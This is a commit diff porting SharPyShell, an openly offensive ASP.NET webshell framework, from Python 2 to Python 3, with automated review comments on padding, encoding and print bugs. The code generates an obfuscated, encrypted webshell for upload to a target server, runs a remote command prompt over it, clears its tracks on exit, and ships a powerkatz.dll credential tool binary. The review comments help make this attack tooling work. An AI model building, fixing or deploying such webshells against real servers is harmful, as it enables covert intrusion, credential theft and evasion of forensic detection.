Projects STRLCPY SharPyShell Commits 958c4012
    .gitignore
     1 +#custom ignores
     2 + 
    1 3  *.pyc
    2 4  .idea/
     5 +venv/
    3 6   
    4 7  # exclude everything
    5 8  output/*
    6 9  # exception to the rule
    7 10  !output/.gitkeep
    8 11   
     12 + 
     13 +# Visual Studio template
     14 + 
     15 +## Ignore Visual Studio temporary files, build results, and
     16 +## files generated by popular Visual Studio add-ons.
     17 +##
     18 +## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
     19 + 
     20 +# User-specific files
     21 +*.rsuser
     22 +*.suo
     23 +*.user
     24 +*.userosscache
     25 +*.sln.docstates
     26 + 
     27 +# User-specific files (MonoDevelop/Xamarin Studio)
     28 +*.userprefs
     29 + 
     30 +# Mono auto generated files
     31 +mono_crash.*
     32 + 
     33 +# Build results
     34 +[Dd]ebug/
     35 +[Dd]ebugPublic/
     36 +[Rr]elease/
     37 +[Rr]eleases/
     38 +x64/
     39 +x86/
     40 +[Ww][Ii][Nn]32/
     41 +[Aa][Rr][Mm]/
     42 +[Aa][Rr][Mm]64/
     43 +bld/
     44 +[Bb]in/
     45 +[Oo]bj/
     46 +[Ll]og/
     47 +[Ll]ogs/
     48 + 
     49 +# Visual Studio 2015/2017 cache/options directory
     50 +.vs/
     51 +# Uncomment if you have tasks that create the project's static files in wwwroot
     52 +#wwwroot/
     53 + 
     54 +# Visual Studio 2017 auto generated files
     55 +Generated\ Files/
     56 + 
     57 +# MSTest test Results
     58 +[Tt]est[Rr]esult*/
     59 +[Bb]uild[Ll]og.*
     60 + 
     61 +# NUnit
     62 +*.VisualState.xml
     63 +TestResult.xml
     64 +nunit-*.xml
     65 + 
     66 +# Build Results of an ATL Project
     67 +[Dd]ebugPS/
     68 +[Rr]eleasePS/
     69 +dlldata.c
     70 + 
     71 +# Benchmark Results
     72 +BenchmarkDotNet.Artifacts/
     73 + 
     74 +# .NET Core
     75 +project.lock.json
     76 +project.fragment.lock.json
     77 +artifacts/
     78 + 
     79 +# ASP.NET Scaffolding
     80 +ScaffoldingReadMe.txt
     81 + 
     82 +# StyleCop
     83 +StyleCopReport.xml
     84 + 
     85 +# Files built by Visual Studio
     86 +*_i.c
     87 +*_p.c
     88 +*_h.h
     89 +*.ilk
     90 +*.meta
     91 +*.obj
     92 +*.iobj
     93 +*.pch
     94 +*.pdb
     95 +*.ipdb
     96 +*.pgc
     97 +*.pgd
     98 +*.rsp
     99 +*.sbr
     100 +*.tlb
     101 +*.tli
     102 +*.tlh
     103 +*.tmp
     104 +*.tmp_proj
     105 +*_wpftmp.csproj
     106 +*.log
     107 +*.tlog
     108 +*.vspscc
     109 +*.vssscc
     110 +.builds
     111 +*.pidb
     112 +*.svclog
     113 +*.scc
     114 + 
     115 +# Chutzpah Test files
     116 +_Chutzpah*
     117 + 
     118 +# Visual C++ cache files
     119 +ipch/
     120 +*.aps
     121 +*.ncb
     122 +*.opendb
     123 +*.opensdf
     124 +*.sdf
     125 +*.cachefile
     126 +*.VC.db
     127 +*.VC.VC.opendb
     128 + 
     129 +# Visual Studio profiler
     130 +*.psess
     131 +*.vsp
     132 +*.vspx
     133 +*.sap
     134 + 
     135 +# Visual Studio Trace Files
     136 +*.e2e
     137 + 
     138 +# TFS 2012 Local Workspace
     139 +$tf/
     140 + 
     141 +# Guidance Automation Toolkit
     142 +*.gpState
     143 + 
     144 +# ReSharper is a .NET coding add-in
     145 +_ReSharper*/
     146 +*.[Rr]e[Ss]harper
     147 +*.DotSettings.user
     148 + 
     149 +# TeamCity is a build add-in
     150 +_TeamCity*
     151 + 
     152 +# DotCover is a Code Coverage Tool
     153 +*.dotCover
     154 + 
     155 +# AxoCover is a Code Coverage Tool
     156 +.axoCover/*
     157 +!.axoCover/settings.json
     158 + 
     159 +# Coverlet is a free, cross platform Code Coverage Tool
     160 +coverage*.json
     161 +coverage*.xml
     162 +coverage*.info
     163 + 
     164 +# Visual Studio code coverage results
     165 +*.coverage
     166 +*.coveragexml
     167 + 
     168 +# NCrunch
     169 +_NCrunch_*
     170 +.*crunch*.local.xml
     171 +nCrunchTemp_*
     172 + 
     173 +# MightyMoose
     174 +*.mm.*
     175 +AutoTest.Net/
     176 + 
     177 +# Web workbench (sass)
     178 +.sass-cache/
     179 + 
     180 +# Installshield output folder
     181 +[Ee]xpress/
     182 + 
     183 +# DocProject is a documentation generator add-in
     184 +DocProject/buildhelp/
     185 +DocProject/Help/*.HxT
     186 +DocProject/Help/*.HxC
     187 +DocProject/Help/*.hhc
     188 +DocProject/Help/*.hhk
     189 +DocProject/Help/*.hhp
     190 +DocProject/Help/Html2
     191 +DocProject/Help/html
     192 + 
     193 +# Click-Once directory
     194 +publish/
     195 + 
     196 +# Publish Web Output
     197 +*.[Pp]ublish.xml
     198 +*.azurePubxml
     199 +# Note: Comment the next line if you want to checkin your web deploy settings,
     200 +# but database connection strings (with potential passwords) will be unencrypted
     201 +*.pubxml
     202 +*.publishproj
     203 + 
     204 +# Microsoft Azure Web App publish settings. Comment the next line if you want to
     205 +# checkin your Azure Web App publish settings, but sensitive information contained
     206 +# in these scripts will be unencrypted
     207 +PublishScripts/
     208 + 
     209 +# NuGet Packages
     210 +*.nupkg
     211 +# NuGet Symbol Packages
     212 +*.snupkg
     213 +# The packages folder can be ignored because of Package Restore
     214 +**/[Pp]ackages/*
     215 +# except build/, which is used as an MSBuild target.
     216 +!**/[Pp]ackages/build/
     217 +# Uncomment if necessary however generally it will be regenerated when needed
     218 +#!**/[Pp]ackages/repositories.config
     219 +# NuGet v3's project.json files produces more ignorable files
     220 +*.nuget.props
     221 +*.nuget.targets
     222 + 
     223 +# Nuget personal access tokens and Credentials
     224 +nuget.config
     225 + 
     226 +# Microsoft Azure Build Output
     227 +csx/
     228 +*.build.csdef
     229 + 
     230 +# Microsoft Azure Emulator
     231 +ecf/
     232 +rcf/
     233 + 
     234 +# Windows Store app package directories and files
     235 +AppPackages/
     236 +BundleArtifacts/
     237 +Package.StoreAssociation.xml
     238 +_pkginfo.txt
     239 +*.appx
     240 +*.appxbundle
     241 +*.appxupload
     242 + 
     243 +# Visual Studio cache files
     244 +# files ending in .cache can be ignored
     245 +*.[Cc]ache
     246 +# but keep track of directories ending in .cache
     247 +!?*.[Cc]ache/
     248 + 
     249 +# Others
     250 +ClientBin/
     251 +~$*
     252 +*~
     253 +*.dbmdl
     254 +*.dbproj.schemaview
     255 +*.jfm
     256 +*.pfx
     257 +*.publishsettings
     258 +orleans.codegen.cs
     259 + 
     260 +# Including strong name files can present a security risk
     261 +# (https://github.com/github/gitignore/pull/2483#issue-259490424)
     262 +#*.snk
     263 + 
     264 +# Since there are multiple workflows, uncomment next line to ignore bower_components
     265 +# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
     266 +#bower_components/
     267 + 
     268 +# RIA/Silverlight projects
     269 +Generated_Code/
     270 + 
     271 +# Backup & report files from converting an old project file
     272 +# to a newer Visual Studio version. Backup files are not needed,
     273 +# because we have git ;-)
     274 +_UpgradeReport_Files/
     275 +Backup*/
     276 +UpgradeLog*.XML
     277 +UpgradeLog*.htm
     278 +ServiceFabricBackup/
     279 +*.rptproj.bak
     280 + 
     281 +# SQL Server files
     282 +*.mdf
     283 +*.ldf
     284 +*.ndf
     285 + 
     286 +# Business Intelligence projects
     287 +*.rdl.data
     288 +*.bim.layout
     289 +*.bim_*.settings
     290 +*.rptproj.rsuser
     291 +*- [Bb]ackup.rdl
     292 +*- [Bb]ackup ([0-9]).rdl
     293 +*- [Bb]ackup ([0-9][0-9]).rdl
     294 + 
     295 +# Microsoft Fakes
     296 +FakesAssemblies/
     297 + 
     298 +# GhostDoc plugin setting file
     299 +*.GhostDoc.xml
     300 + 
     301 +# Node.js Tools for Visual Studio
     302 +.ntvs_analysis.dat
     303 +node_modules/
     304 + 
     305 +# Visual Studio 6 build log
     306 +*.plg
     307 + 
     308 +# Visual Studio 6 workspace options file
     309 +*.opt
     310 + 
     311 +# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
     312 +*.vbw
     313 + 
     314 +# Visual Studio LightSwitch build output
     315 +**/*.HTMLClient/GeneratedArtifacts
     316 +**/*.DesktopClient/GeneratedArtifacts
     317 +**/*.DesktopClient/ModelManifest.xml
     318 +**/*.Server/GeneratedArtifacts
     319 +**/*.Server/ModelManifest.xml
     320 +_Pvt_Extensions
     321 + 
     322 +# Paket dependency manager
     323 +.paket/paket.exe
     324 +paket-files/
     325 + 
     326 +# FAKE - F# Make
     327 +.fake/
     328 + 
     329 +# CodeRush personal settings
     330 +.cr/personal
     331 + 
     332 +# Python Tools for Visual Studio (PTVS)
     333 +__pycache__/
     334 +*.pyc
     335 + 
     336 +# Cake - Uncomment if you are using it
     337 +# tools/**
     338 +# !tools/packages.config
     339 + 
     340 +# Tabs Studio
     341 +*.tss
     342 + 
     343 +# Telerik's JustMock configuration file
     344 +*.jmconfig
     345 + 
     346 +# BizTalk build output
     347 +*.btp.cs
     348 +*.btm.cs
     349 +*.odx.cs
     350 +*.xsd.cs
     351 + 
     352 +# OpenCover UI analysis results
     353 +OpenCover/
     354 + 
     355 +# Azure Stream Analytics local run output
     356 +ASALocalRun/
     357 + 
     358 +# MSBuild Binary and Structured Log
     359 +*.binlog
     360 + 
     361 +# NVidia Nsight GPU debugger configuration file
     362 +*.nvuser
     363 + 
     364 +# MFractors (Xamarin productivity tool) working folder
     365 +.mfractor/
     366 + 
     367 +# Local History for Visual Studio
     368 +.localhistory/
     369 + 
     370 +# BeatPulse healthcheck temp database
     371 +healthchecksdb
     372 + 
     373 +# Backup folder for Package Reference Convert tool in Visual Studio 2017
     374 +MigrationBackup/
     375 + 
     376 +# Ionide (cross platform F# VS Code tools) working folder
     377 +.ionide/
     378 + 
     379 +# Fody - auto-generated XML schema
     380 +FodyWeavers.xsd
     381 + 
     382 +# VS Code files for those working on multiple tools
     383 +.vscode/*
     384 +!.vscode/settings.json
     385 +!.vscode/tasks.json
     386 +!.vscode/launch.json
     387 +!.vscode/extensions.json
     388 +*.code-workspace
     389 + 
     390 +# Local History for Visual Studio Code
     391 +.history/
     392 + 
     393 +# Windows Installer files from build outputs
     394 +*.cab
     395 +*.msi
     396 +*.msix
     397 +*.msm
     398 +*.msp
     399 + 
     400 +# JetBrains Rider
     401 +.idea/
     402 +*.sln.iml
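--- a/README.md
+++ b/README.md
@@ -17,12 +17,12 @@
 
 ## Requirements
 
-Python version >= 2.7
+Python version >= 3.6
 
 and
 
 ```
-pip install -r requirements.txt
+pip3 install -r requirements.txt
 ```
 
 ## Description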
    SharPyShell.py
    1  -#!/usr/bin/env python2
     1 +#!/usr/bin/env python3
    2 2   
    3 3  from core.Generate import Generate
    4 4  from core.SharPyShellPrompt import SharPyShellPrompt
    skipped 139 lines
    144 144   
    145 145   
    146 146  if __name__ == '__main__':
    147  - print config.banner
     147 + print (config.banner)
    148 148   parser = argparse.ArgumentParser(prog='SharPyShell', formatter_class=argparse.RawTextHelpFormatter,
    149 149   epilog=example_text_main)
    150 150   parser.add_argument('--version', action='version', version=config.header)
    skipped 2 lines
    153 153   create_interact_parser(subparsers)
    154 154   args = parser.parse_args()
    155 155   
    156  - if args.mode == 'generate':
    157  - generate_obj = Generate(args.password, args.encryption, args.obfuscator, args.endian_type, args.output)
    158  - generate_obj.generate()
     156 + if args.__contains__('mode'):
     157 + if args.mode == 'generate':
     158 + generate_obj = Generate(args.password, args.encryption, args.obfuscator, args.endian_type, args.output)
     159 + generate_obj.generate()
    159 160   
    160  - if args.mode == 'interact':
    161  - prompt = SharPyShellPrompt(args.password, args.encryption, args.default_shell, args.url,
    162  - args.user_agent, args.cookies, args.custom_header, args.insecure, args.proxy)
    163  - prompt.cmdloop('\n')
     161 + if args.mode == 'interact':
     162 + prompt = SharPyShellPrompt(args.password, args.encryption, args.default_shell, args.url,
     163 + args.user_agent, args.cookies, args.custom_header, args.insecure, args.proxy)
     164 + prompt.cmdloop('\n')
     165 + else:
     166 + parser.print_help()
    164 167   
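Review bot: `args.__contains__('mode')` on new line 156 calls a dunder directly where the membership operator is the idiom; `if 'mode' in args:` reads the same and works because `argparse.Namespace` defines `__contains__`. The `else: parser.print_help()` branch does cover the Python 3 case where no sub-command was given, since sub-parsers are optional by default there. As a point of style, the converted prints carry a space before the parenthesis (`print (config.banner)`), which most formatters reject; `print(config.banner)` is the conventional form, and the same spacing appears in core/Environment.py, core/Generate.py, core/SharPyShellPrompt.py and modules/download.py. The `if __name__ == '__main__':` block begins inside this hunk and the module lines above it are not shown.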
    core/ChannelAES.py
    1 1  from utils.Singleton import Singleton
    2 2  from Crypto.Cipher import AES
     3 +from Crypto.Util.Padding import pad
     4 +from Crypto.Util.Padding import unpad
    3 5   
    4 6   
    5 7  class ChannelAES(Singleton):
    skipped 2 lines
    8 10   BS = 16
    9 11   
    10 12   def __init__(self, password):
    11  - self.hashed_password = password.decode('hex')
     13 + self.hashed_password = bytes.fromhex(password)
    12 14   self.IV = self.hashed_password[0:self.BS]
    13 15   
    14 16   def encrypt(self, plain_data):
    15  - pad = lambda s: s + (self.BS - len(s) % self.BS) * chr(self.BS - len(s) % self.BS)
    16  - plain_data_pad = pad(plain_data)
     17 + plain_data_pad = pad(plain_data, self.BS)
    17 18   aes = AES.new(self.hashed_password, AES.MODE_CBC, self.IV)
    18 19   encrypted_data = aes.encrypt(plain_data_pad)
    19 20   return encrypted_data
    20 21   
    21 22   def decrypt(self, encrypted_data):
    22 23   aes = AES.new(self.hashed_password, AES.MODE_CBC, self.IV)
    23  - unpad = lambda s: s[:-ord(s[len(s) - 1:])]
    24 24   decrypted_data = aes.decrypt(encrypted_data)
    25  - return unpad(decrypted_data)
     25 + return unpad(decrypted_data, self.BS)
     26 + 
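Review bot: The new `unpad(decrypted_data, self.BS)` on line 25 raises `ValueError` when the padding is malformed, whereas the removed lambda returned stripped bytes silently, so a truncated or tampered response now surfaces as an uncaught `ValueError` rather than through the channel's usual error path; `decrypt` should catch it and re-raise with context, e.g. `except ValueError as exc: raise ValueError('invalid padding in response') from exc`, or the caller in core/Module.py should expect it. Both `pad` and `unpad` default to PKCS#7, which matches the byte layout of the removed lambdas, so the wire format is unchanged. `pad` requires `bytes`, so every caller must now encode before calling `encrypt`, as `Module._encrypt_request` does in this commit. The IV taken from the first 16 bytes of the key on line 14 is pre-existing and outside this change, but with CBC it makes identical plaintexts encrypt to identical ciphertexts, which is worth a comment on that line for anyone assessing the channel.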
    core/ChannelXOR.py
    1 1  from utils.Singleton import Singleton
    2  - 
     2 +from itertools import cycle
    3 3   
    4 4  class ChannelXOR(Singleton):
    5 5   password = None
    6 6   
    7 7   def __init__(self, password):
    8  - self.password = password.encode('utf-8')
     8 + self.password = password
    9 9   
    10 10   def encrypt(self, plain_data):
    11  - key = self.password
    12  - from itertools import izip, cycle
    13  - xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(plain_data, cycle(key)))
    14  - return bytearray(xored)
     11 + key = self.password.encode()
     12 + xored = b''.join(bytes([(x ^ y)]) for (x, y) in list(zip(plain_data, cycle(key))))
     13 + return xored
    15 14   
    16 15   def decrypt(self, encrypted_data):
    17 16   return self.encrypt(encrypted_data)
     17 + 
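Review bot: An empty key makes `encrypt` on new lines 11-13 silently return `b''`, because `cycle(b'')` yields nothing and `zip` stops immediately, so the whole plaintext is dropped without an error; a guard such as `if not key: raise ValueError('empty XOR key')` before the join would make that failure visible. The join itself builds a one-byte `bytes` object per element and materialises the zip with `list(...)` for no benefit; `return bytes(x ^ y for x, y in zip(plain_data, cycle(key)))` is the equivalent one-liner. `self.password.encode()` on line 11 also assumes the constructor received `str`; `SharPyShellPrompt.__init__` in this same commit now does `password = password.encode('utf-8')` before building channels, so if its non-AES branch (not shown) forwards those bytes unchanged this call will raise `AttributeError` — worth confirming.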
    core/Environment.py
    skipped 6 lines
    7 7   
    8 8   _exception_class = GetTempDirectoryException
    9 9   
    10  - _runtime_code = ur"""
     10 + _runtime_code = r"""
    11 11   using System;using System.IO;using System.Diagnostics;using System.Text;
    12 12   public class SharPyShell
    13 13   {
    skipped 31 lines
    45 45   
    46 46   _exception_class = GetEnvDirectoryException
    47 47   
    48  - _runtime_code = ur"""
     48 + _runtime_code = r"""
    49 49   using System;using System.IO;using System.Diagnostics;using System.Text;
    50 50   using System.Security.AccessControl;using System.Security.Principal;
    51 51  
    skipped 49 lines
    101 101   
    102 102   _exception_class = ClearDirectoriesException
    103 103   
    104  - _runtime_code = ur"""
     104 + _runtime_code = r"""
    105 105   using System;using System.IO;using System.Diagnostics;using System.Text;
    106 106   public class SharPyShell
    107 107   {
    skipped 90 lines
    198 198   excluded_path = ['env_directory', 'working_directory']
    199 199   modules_path = ['@"' + v + '"' for k, v in env_settings.items() if k not in excluded_path]
    200 200   modules_path_string_array = '{' + ','.join(modules_path) + '}'
    201  - print '\nRemoving tracks....\n'
     201 + print ('\nRemoving tracks....\n')
    202 202   result = self.clear_dir_obj.run([modules_path_string_array, env_directory])
    203 203   if '{{{ClearDirectoriesException}}}' not in result:
    204 204   result = format_output(result)
    skipped 4 lines
    core/Generate.py
    1 1  from core import config
    2 2  from struct import unpack
     3 +from itertools import cycle
    3 4  import hashlib
    4 5  import random
    5  - 
     6 +import io
     7 +import os
    6 8   
    7 9  class Generate():
    8 10   
    skipped 2 lines
    11 13   __obfuscator = ''
    12 14   __endian_type = ''
    13 15   
    14  - __templates_path = config.sharpyshell_path+'agent/'
    15  - __runtime_compiler_path = __templates_path + 'runtime_compiler/'
     16 + __templates_path = config.sharpyshell_path+'agent'+os.sep
     17 + __runtime_compiler_path = __templates_path + 'runtime_compiler'+os.sep
    16 18   __output_path = config.output_path + 'sharpyshell.aspx'
    17 19   
    18 20   def __init__(self, password, encryption, obfuscator, endian_type, output):
     21 + password = password.encode('utf-8')
    19 22   if encryption == 'aes128':
    20 23   self.__password = hashlib.md5(password).hexdigest()
    21 24   else:
    skipped 19 lines
    41 44   
    42 45   def __generate_webshell_code_encrypted_dll(self, template_code):
    43 46   def xor_file(path, key):
    44  - with open(path, 'rb') as file_handle:
     47 + with io.open(path, mode='rb') as file_handle:
    45 48   plain_data = file_handle.read()
    46  - from itertools import izip, cycle
    47  - xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(plain_data, cycle(key)))
    48  - return bytearray(xored)
    49  - 
    50  - def generate_byte_file_string(byte_arr):
    51  - output = [str(hex(byte)) for byte in byte_arr]
    52  - return '{' + ",".join(output) + '}'
     49 + xored = []
     50 + for (x, y) in list(zip(plain_data, cycle(key))):
     51 + xored.append(hex(x ^ ord(y)))
     52 + return '{' + ",".join(xored) + '}'
    53 53   
    54 54   if 'aes' in self.__encryption:
    55 55   dll_name = 'runtime_compiler_aes.dll'
    skipped 1 lines
    57 57   dll_name = 'runtime_compiler_xor.dll'
    58 58   runtime_compiler_dll_path = self.__runtime_compiler_path + dll_name
    59 59   obfuscated_dll = xor_file(runtime_compiler_dll_path, self.__password)
    60  - obfuscated_dll_string = generate_byte_file_string(obfuscated_dll)
    61 60   webshell_code = template_code.replace('{{SharPyShell_Placeholder_pwd}}', self.__password)
    62  - webshell_code = webshell_code.replace('{{SharPyShell_Placeholder_enc_dll}}', obfuscated_dll_string)
     61 + webshell_code = webshell_code.replace('{{SharPyShell_Placeholder_enc_dll}}', obfuscated_dll)
    63 62   return webshell_code
    64 63   
    65 64   def __generate_webshell_code_ulong_compression(self, template_code):
    66 65   def get_dll_code(dll_code_path):
    67  - with open(dll_code_path, 'r') as file_handle:
     66 + with open(dll_code_path, 'rb') as file_handle:
    68 67   dll_code = file_handle.read()
    69 68   return dll_code
    70 69   
    skipped 8 lines
    79 78   representation = '='
    80 79   for i in range(0, len(dll_code), 8):
    81 80   int_conversion = unpack(representation + 'Q', dll_code[i:i + 8])[0]
    82  - ulong_quotients.append(str(int_conversion / divisor))
     81 + ulong_quotients.append(str(int_conversion // divisor))
    83 82   ulong_remainders.append(str(int_conversion % divisor))
    84 83   ulong_quotients_string = '{' + ','.join(ulong_quotients) + '}'
    85 84   ulong_remainders_string = '{' + ','.join(ulong_remainders) + '}'
    skipped 23 lines
    109 108   webshell_output_path = self.__output_path
    110 109   with open(webshell_output_path, 'w') as file_handle:
    111 110   file_handle.write(webshell_code)
    112  - print 'SharPyShell webshell written correctly to: ' + webshell_output_path
    113  - print '\nUpload it to the target server and let\'s start having some fun :) \n\n'
     111 + print ('SharPyShell webshell written correctly to: ' + webshell_output_path)
     112 + print ('\nUpload it to the target server and let\'s start having some fun :) \n\n')
    114 113   
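Review bot: `xor_file` (new lines 49-52) returns `'{}'` when `key` is empty, because `cycle('')` yields nothing and the loop body never runs, so an empty password would embed an empty byte array into the generated file instead of failing; add `if not key: raise ValueError('empty key')` before the loop. The `list(...)` around `zip` only forces an extra copy of the DLL into memory; iterating `zip(plain_data, cycle(key))` directly is equivalent. `password = password.encode('utf-8')` on line 21 runs before the `if encryption == 'aes128':` branch, so whatever the out-of-view `else:` assigns to `self.__password` may now be `bytes`, while `ord(y)` in `xor_file` and `template_code.replace(..., self.__password)` on line 60 both require `str` — please confirm that branch still yields a string. `io.open` on line 47 is the same object as the builtin `open` used on line 66, so one spelling would be more consistent.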
    core/Module.py
    skipped 19 lines
    20 20   """
    21 21   '''runtime_code must have the class name "SharPyShell" and the main function name "ExecRuntime". The ExecRuntime
    22 22   function will be the code run on the server and it must return results in byte[] type '''
    23  - _runtime_code = ur"""
     23 + _runtime_code = r"""
    24 24   using System;using System.IO;using System.Diagnostics;using System.Text;
    25 25   public class SharPyShell
    26 26   {
    skipped 29 lines
    56 56   # End Override this method
    57 57   
    58 58   def _encrypt_request(self, request_clear):
    59  - request_encrypted = self._channel_enc_obj.encrypt(request_clear)
     59 + request_encrypted = self._channel_enc_obj.encrypt(request_clear.encode())
    60 60   request_encrypted_encoded = base64.b64encode(request_encrypted)
    61  - return request_encrypted_encoded
     61 + return request_encrypted_encoded.decode()
    62 62   
    63 63   def _post_request(self, request_encrypted_encoded):
    64 64   response_status_code, response_headers, response_text = \
    65 65   self._request_object.send_request(request_encrypted_encoded)
    66 66   if response_status_code != 200:
    67  - raise self._exception_class('{{{' + self._exception_class.__name__ + '}}}\n' +
     67 + raise self._exception_class('{{{' + str(self._exception_class.__name__) + '}}}\n' +
    68 68   str(response_headers) + '\n\n' +
    69  - response_text)
     69 + str(response_text))
    70 70   return response_text
    71 71   
    72 72   def _decrypt_response(self, encrypted_response_encoded):
    skipped 2 lines
    75 75   return response_clear
    76 76   
    77 77   def _parse_response(self, response):
     78 + response = response.decode() if isinstance(response, bytes) else response
    78 79   if '{{{' + self._exception_class.__name__ + '}}}' in response:
    79 80   raise self._exception_class(str(response))
    80 81   if '{{{SharPyShellError}}}' in response or '{{{PythonError}}}' in response:
    skipped 17 lines
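Review bot: `response.decode()` on the new line 78 uses strict UTF-8, so a response carrying non-UTF-8 bytes (command output in a legacy code page, or raw file data) raises `UnicodeDecodeError` before the marker checks below it run, and that exception is not the module's `_exception_class`; `response.decode(errors='replace')` keeps marker detection working on malformed input, or decode inside a `try` and raise `self._exception_class`. On line 67 `str(self._exception_class.__name__)` is redundant because `__name__` is already a `str`, and `str(response_text)` on line 69 will embed a `b'...'` repr if `response_text` is `bytes` — its type is not visible here, but if it is bytes, `response_text.decode(errors='replace')` gives a readable message. The `.encode()` before `encrypt` and the `.decode()` after `b64encode` in `_encrypt_request` are the right pairing for the now bytes-only channel API.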
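--- a/core/Request.py
+++ b/core/Request.py
@@ -1,3 +1,4 @@
+from utils.Singleton import Singleton
 from utils.Singleton import Singleton
 import ssl
 import urllib3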
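Review bot: The added line 1 duplicates the `from utils.Singleton import Singleton` that already exists on the next line, so the import simply executes twice; drop the added line. Nothing else in this file changes, and the remaining 50 lines are not shown.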
    core/SharPyShellPrompt.py
    1  -import config
     1 +from core import config
    2 2  from cmd import Cmd
    3 3  import os
    4 4  import glob
    5 5  import sys
     6 +import importlib
    6 7  import shlex
    7 8  import hashlib
    8 9  import signal
     10 +import platform
    9 11  from utils import prettify
    10 12  from utils.normalize_args import normalize_args
    11 13  from utils.random_string import random_generator
    skipped 16 lines
    28 30   
    29 31   def __init__(self, password, channel_enc_mode, default_shell, url, user_agent,
    30 32   cookies, custom_headers, insecure_ssl, proxy):
    31  - reload(sys)
    32  - sys.setdefaultencoding('utf8')
    33  - signal.signal(signal.SIGTSTP, lambda s, f: self.do_quit())
     33 + importlib.reload(sys)
     34 + #sys.setdefaultencoding('utf8')
     35 + password = password.encode('utf-8')
     36 + if platform.system() == 'Windows':
     37 + signal.signal(signal.SIGTERM, lambda s, f: self.do_quit())
     38 + else:
     39 + signal.signal(signal.SIGTSTP, lambda s, f: self.do_quit())
    34 40   Cmd.__init__(self)
    35 41   if channel_enc_mode == 'aes128':
    36 42   self.password = hashlib.md5(password).hexdigest()
    skipped 43 lines
    80 86   return self.emptyline()
    81 87   if cmd.startswith('#'):
    82 88   response = self.onecmd_custom(cmd.lstrip('#'), args)
    83  - print response
     89 + print (response)
    84 90   return response
    85 91   if cmd in self.helper_commands:
    86 92   func = getattr(self, 'do_' + cmd.lstrip('#'))
    skipped 26 lines
    113 119   """Change the current working directory."""
    114 120   working_directory = self.modules_settings['working_directory']
    115 121   if arg == "" or arg == " " or arg == '.':
    116  - print working_directory
     122 + print (working_directory)
    117 123   return
    118 124   if arg == '..':
    119 125   arg = working_directory.split('\\')
    skipped 7 lines
    127 133   elif len(arg) > 0:
    128 134   arg = '\\'.join(arg)
    129 135   else:
    130  - print "Empty Path."
     136 + print ("Empty Path.")
    131 137   return
    132 138   else:
    133 139   if '/' in arg:
    skipped 9 lines
    143 149   if '{{{SharPyShellError}}}' not in response:
    144 150   self.modules_settings['working_directory'] = arg
    145 151   else:
    146  - print response
     152 + print (response)
    147 153   return response
    148 154   
    149 155   def do_help(self, arg):
    150 156   """List available commands."""
    151 157   if arg and arg.lstrip('#') in self.modules_loaded_tree:
    152  - print self.modules_loaded[arg.lstrip('#')].complete_help
     158 + print (self.modules_loaded[arg.lstrip('#')].complete_help)
    153 159   else:
    154  - print "\n\n" + self.doc_header + "\n"
     160 + print ("\n\n" + self.doc_header + "\n")
    155 161   data = [['\nCommands\n', '\nDesc\n']]
    156 162   for module_name in sorted(self.modules_loaded_tree):
    157 163   data.append(['#%s' % module_name, self.modules_loaded[module_name].short_help])
    158  - print prettify.tablify(data, table_border=False)
     164 + print (prettify.tablify(data, table_border=False))
    159 165   print
    160  - print "\n" + "SharPyShell Helper Commands:" + "\n"
     166 + print ("\n" + "SharPyShell Helper Commands:" + "\n")
    161 167   data = [['\nCommands\n', '\nDesc\n']]
    162 168   for module_name in sorted(self.helper_commands):
    163 169   data.append(['%s' % module_name, getattr(self, 'do_'+module_name).__doc__])
    164  - print prettify.tablify(data, table_border=False)
     170 + print (prettify.tablify(data, table_border=False))
    165 171   print
    166 172   
    167 173   def complete_help(self, text, line, start_index, end_index):
    skipped 49 lines
    217 223   return
    218 224   # Clean trailing newline if existent to prettify output
    219 225   result = result[:-1] if (
    220  - isinstance(result, basestring) and
     226 + isinstance(result, str) and
    221 227   result.endswith('\n')
    222 228   ) else result
    223  - print result
     229 + print (result)
    224 230   
    225 231   def cmdloop(self, intro=None):
    226 232   """Repeatedly issue a prompt, accept input, parse an initial prefix
    skipped 24 lines
    251 257   else:
    252 258   if self.use_rawinput:
    253 259   try:
    254  - line = raw_input(self.prompt)
     260 + line = input(self.prompt)
    255 261   except EOFError:
    256 262   line = 'EOF'
    257 263   else:
    skipped 21 lines
    279 285   def do_quit(self, args=[]):
    280 286   """Quit the program."""
    281 287   if self.online:
    282  - print "\n\nQuitting...\n"
    283  - print self.env_obj.clear_env(self.modules_settings)
     288 + print ("\n\nQuitting...\n")
     289 + print (self.env_obj.clear_env(self.modules_settings))
    284 290   else:
    285  - print args[0] + "\n\n\nTarget Offline...\n"
     291 + print (args[0] + "\n\n\nTarget Offline...\n")
    286 292   raise SystemExit
    287 293   
    288 294   def do_exit(self, args=[]):
    skipped 3 lines
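Review bot: The bare `print` statements on new lines 165 and 171 of `do_help` (unchanged context between the converted `print (...)` calls) are now plain expressions that evaluate the builtin and emit nothing, so the blank line they were meant to produce is lost; they should be `print()`. `importlib.reload(sys)` on line 33 only existed to restore `setdefaultencoding` in Python 2; with that call commented out on line 34 the reload serves no purpose and both lines can go. In `do_quit`, the mutable default `args=[]` combined with `print (args[0] + ...)` on line 291 means the signal-handler lambdas, which call `self.do_quit()` with no argument, raise `IndexError` instead of printing when `self.online` is false; `args=None` with `message = args[0] if args else ''` avoids that.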
    core/config.py
    1 1  import sys
    2 2  import os
    3 3   
    4  -sharpyshell_version='1.2.1'
     4 +sharpyshell_version='1.3'
    5 5   
    6 6  header = '#SharPyShell v' + sharpyshell_version + ' - @splinter_code'
    7 7  banner = """
    skipped 11 lines
    19 19   
    20 20   """ % header
    21 21   
    22  -sharpyshell_path=os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
     22 +sharpyshell_path=os.path.dirname(os.path.realpath(sys.argv[0])) + os.sep
    23 23  sys.path.insert(0, sharpyshell_path)
    24  -modules_paths=sharpyshell_path + 'modules/'
    25  -output_path=sharpyshell_path + 'output/'
     24 +modules_paths=sharpyshell_path + 'modules' + os.sep
     25 +output_path=sharpyshell_path + 'output' + os.sep
    26 26   
  • modules/dll/powerkatz.dll
    Binary file.
    modules/download.py
    skipped 1 lines
    2 2  from core import config
    3 3  import ntpath
    4 4  import traceback
     5 +from time import sleep
    5 6   
    6 7   
    7 8  class DownloadModuleException(ModuleException):
    skipped 15 lines
    23 24   Positional arguments:
    24 25   remote_input_path The file path you want to download from the remote server
    25 26   local_output_path The path where the file will be saved on your local machine
